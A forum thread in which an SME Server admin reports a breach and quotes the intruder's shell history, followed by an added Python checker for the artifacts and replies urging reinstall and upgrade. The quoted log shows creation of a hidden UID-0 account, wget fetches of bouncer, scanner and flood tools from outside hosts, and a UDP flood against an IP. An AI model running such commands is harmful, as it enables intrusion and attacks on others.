Koozali.org: home of the SME Server

Security breach!

mindea

Security breach!
« on: March 22, 2007, 05:23:49 PM »
It looks like my server security was breached. I think due to a lazy password for an SSH login. But once in, I don't know how they managed to change the admin password, which was very secure. The root password was not changed. I'm curious as to what they were up to. Below is some of the command history.

$ /usr/sbin/useradd -u -0 -o -g -0 gepe

Later, this appears:

   42  lynx www.cservice.undernet.org/live
   43  w
   44  ps x
   45  cd .gepe
   46  mkdir .gepe
   47  cd .gepe
   48  wget bnc-irc.trei.ro/linux/psybnc.tar.gz
   49  tar xzvf psybnc.tar.gz
   50  cd psybnc
   51  make
   52  cd -
   53  wget http://whynot.saveitfree.com/linux.tgz
   54  w
   55  cd .gepe
   56  ls
   57  wget http://iasi-hack.sufx.net/strobe.zip
   58  tar xzvf strobe.zip
   59  cd strobe
   60  ./strobe 85.204.247.250
   61  ./strobe 89.108.81.36
   62  ./strobe 194.84.153.50
   63  ./strobe 195.199.197.243
   64  ./strobe 81.183.216.57
   65  w
   66  ps x
   67  cd .gepe
   68  ls
   69  cd psybnc
   70  ./psybnc
   71  ls
   72  make
   73  cd -
   74  wget http://whynot.saveitfree.com/linux.tgz
   75  tar xzvf linux.tgz
   76  cd vlad/
   77  ./bash
   78  cd .gepe
   79  cd strobe
   80  ./strobe 217.10.221.145
   81  w
   82  ls
   83  cd .gepe
   84  ls
   85  cd strobe
   86  ./strobe 217.10.195.146
   87  ./strobe 217.10.199.254
   88  w
   89  ls
   90  cd .gepe
   91  ls
   92  wget http://cutitas.uv.ro/udp.tgz
   93  tar xzvf udp.tgz
   94  perl udp.pl 80.17.241.75 0 0
   95  cd .gepe
   96  ls
   97  cd eplo
   98  cd exploituri/
   99  ./p
  100  ls
  101  ./p
  102  ./I
  103  id
  104  ls
  105  cd -
  106  ls
  107  cd
  108  ls
  109  cd .gepe
  110  uname -a
  111  wget help-bnc.octopis.com/do.tgz
  112  tar xzvf do.tgz
  113  ls
  114  ./do

Then I looked in the mail directory. There is no entry for "gepe", but the root entry looked like this:

-rw-rw----    1 root     root            0 Mar 22 02:19 gepe

I have now set my hardware firewall (Sonicwall) to not allow any inbound or outbound traffic from the server. I'd like to avoid having to reinstall if I can figure out how to undo/disable whatever they may have installed. Plus, I'll reset all the passwords to a higher level and put very strict port rules on the firewall.

Any comments would be greatly appreciated. (The server is SME 6.01)

Thanks!
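Added example, not code from the post or from SME Server: a small Python checker for the two artifacts the post describes, a second UID-0 account created with `useradd -o`, and a shell history full of downloads into a hidden directory, scanner runs against raw IP addresses and locally built binaries. The /etc/passwd and history samples are constructed to mirror the post; the `admin` line is an assumed layout, not copied from a real system.

```python
import re
# Constructed sample of /etc/passwd: "gepe" is a second UID-0 account, the
# result of the "useradd -u 0 -o" command quoted in the post above.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
admin:x:100:100:Local Administrator:/home/e-smith:/sbin/e-smith/console
gepe:x:0:0::/home/gepe:/bin/bash
"""

# Constructed shell history, modelled on the commands quoted in the post.
SAMPLE_HISTORY = """\
    1  /usr/sbin/useradd -u -0 -o -g -0 gepe
   45  cd .gepe
   48  wget bnc-irc.trei.ro/linux/psybnc.tar.gz
   51  make
   60  ./strobe 85.204.247.250
   94  perl udp.pl 80.17.241.75 0 0
  110  uname -a
  111  wget help-bnc.octopis.com/do.tgz
"""

# Each indicator is (pattern, reason); one command can match several.
INDICATORS = [
    (re.compile(r"useradd\b.*-u\s+-?0\b"), "account created with UID 0"),
    (re.compile(r"^(wget|curl|lynx)\s+\S+"), "fetched remote file"),
    (re.compile(r"^(cd|mkdir)\s+\.[^./]"), "hidden dot-directory"),
    (re.compile(r"^\./\S+|^make$"), "ran or built a local binary"),
    (re.compile(r"\b\d{1,3}(\.\d{1,3}){3}\b"), "raw IP address argument"),
]

def extra_uid0_accounts(passwd_text):
    """Return every account name other than root whose UID field is 0."""
    rows = [ln.split(":") for ln in passwd_text.splitlines() if ln]
    return [f[0] for f in rows if len(f) > 2 and f[2] == "0" and f[0] != "root"]

def flag_history(history_text):
    """Return (number, command, reasons) for numbered history lines that match."""
    hits = []
    for line in history_text.splitlines():
        m = re.match(r"\s*(\d+)\s+(.*)", line)
        if not m:
            continue  # not a numbered history line
        num, cmd = int(m.group(1)), m.group(2).strip()
        reasons = [why for rx, why in INDICATORS if rx.search(cmd)]
        if reasons:
            hits.append((num, cmd, reasons))
    return hits

if __name__ == "__main__":
    print(extra_uid0_accounts(SAMPLE_PASSWD), flag_history(SAMPLE_HISTORY))
```

Against a live box, feed it the real /etc/passwd and every user's .bash_history; a duplicate UID 0 is the finding that matters most, since that account has full root rights regardless of the root password.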

Confucius

Security breach!
« Reply #1 on: March 22, 2007, 05:37:27 PM »
ANY COMMENT(s)...

Ehmm.. what about upgrading? And since you are suffering from a hack, I would suggest a clean install.

Somewhere in 2005 I was busy with some patches for the 6.x because there were a lot of uncertain safety issues. I guess you missed that.
Even though I had all patches, they managed to breach the security of one server under my control by using a backdoor in awstats. No matter what you do, don't rely on safety too easily. Keeping things updated is the best you can do, and praying that they are not interested in trying to get into your server, because we might be called experts by the people around us. There is always a "better" person.

Learn from it and move on to higher grounds (SME 7)


my 2 cents

Harro

bpivk

Security breach!
« Reply #2 on: March 22, 2007, 07:16:26 PM »
Now you know why you should upgrade your server to 7.1. Didn't you read the forum posts? SME 6 is not maintained anymore and you can thank yourself if you get hacked.

I would suggest that you format your server and install 7.1.2 with the latest updates + implement SSH with public/private keys, or disable it if you don't need it.

Don't bother with removing what they did. Install the newest SME version and patches and you're set. If you just fix what they did, they can hack you again like they did. Having an obsolete server is never a good idea.
"It should just work" if it doesn't report it. Thanks!

byte

Security breach!
« Reply #3 on: March 22, 2007, 08:38:57 PM »
Please do NOT report security breaches on the forum. Please read before you post and you would have seen...

"Don't report security issues here - Contact security at contribs dot org"

I know this is SME Server 6 and obsolete but as a general rule please never report a security breach on a public forum.
--[byte]--

Have you filled in a Bug Report over @ http://bugs.contribs.org ? Please don't wait to be told this way you help us to help you/others - Thanks!

beakersloco

Security breach!
« Reply #4 on: March 23, 2007, 11:41:00 PM »
Let me be the 2nd to say backup any important data and reload but not for the same reason given previously.

I say reload because even though you can see logs of what he did, you still can never be certain that he did not remove any log files. So even if you simply remove what you see he did to your machine, there could still be other files that can allow him to re-enter your machine. He could have simply removed/truncated the log so you could only see what he wanted you to see, so cut your losses and reload.

If possible you might as well take the opportunity to upgrade to the latest version. I just had a drive problem with my 6.1 server a few days ago, and in a week or 2, after I decide on what hard drive/storage options I will be upgrading to, 7.1.


For people who simply see someone with an old, non-supported version of the software and say that he needs to upgrade: if you don't work in the IT field then you probably don't realize that it's not always that easy. While, as stated, knowing of the security risks it is the admin's own fault he got hacked, sometimes one can lose functionality when upgrading, so people will wait before upgrading. This is the reason I normally stay a version behind, to give the SME community time to get some of the custom contribs I like to have working with the latest version. A company a friend works for recently decided at the last minute not to perform a software upgrade because the new version did not include some of the same features the old software has that his company uses.

Last but not least, his hardware might not be capable of supporting the latest version or might run like crap, as I recently found when I had to replace my production system with my slower test system. Version 7.2 really kicks the crap out of a 600 MHz with 128 MB RAM, when in the past this system worked great for what I needed.
"All that's necessary for the forces of evil to win in the world is for enough good men to do nothing." Edmund Burke, Irish orator, philosopher, & politician


For the battle is not yours, but God's.   2 Chronicles 20:15

bpivk

Security breach!
« Reply #5 on: March 24, 2007, 12:54:09 PM »
SME 7 is at version 7.1.3, so this is not just one version behind but at least 3-4 versions, and is not a good thing to do. Yes, there can be problems, but I always update when people don't need the server (at night, 01:00) and it does the trick.

Not to mention that opening SSH without custom certificates is always a bad idea.
"It should just work" if it doesn't report it. Thanks!